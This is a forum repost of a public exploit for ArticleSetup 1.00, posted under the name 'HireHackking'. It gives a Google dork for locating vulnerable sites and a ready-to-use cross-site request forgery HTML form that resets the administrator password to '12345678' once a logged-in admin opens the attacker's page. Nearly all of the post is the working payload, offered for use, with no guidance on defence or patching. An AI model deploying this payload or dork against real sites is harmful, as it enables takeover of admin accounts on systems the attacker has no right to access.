Jump to content

ArticleSetup 1.00 - Cross-Site Request Forgery (Change Admin Password)

HireHackking

By HireHackking in HACKER

· 1 view

<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork   : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00

#Desc:

When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.

#Exploit:
-->

<html>
 <body>
  <form method="post"  action="
http://localhost/{PACH}/admin/adminsettings.php">
      <input type="hidden" name="update" value="1">
      <input type="hidden" name="pass1" type="hidden" value="12345678" >
      <input type="hidden" name="pass2" type="hidden" value="12345678" >
      <input type="submit" value="create">
  </form>
 </body>
</html>

<!--
####################################

[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007
-->

  • 0 Comments

    Recommended Comments

    There are no comments to display.

    Guest
    Add a comment...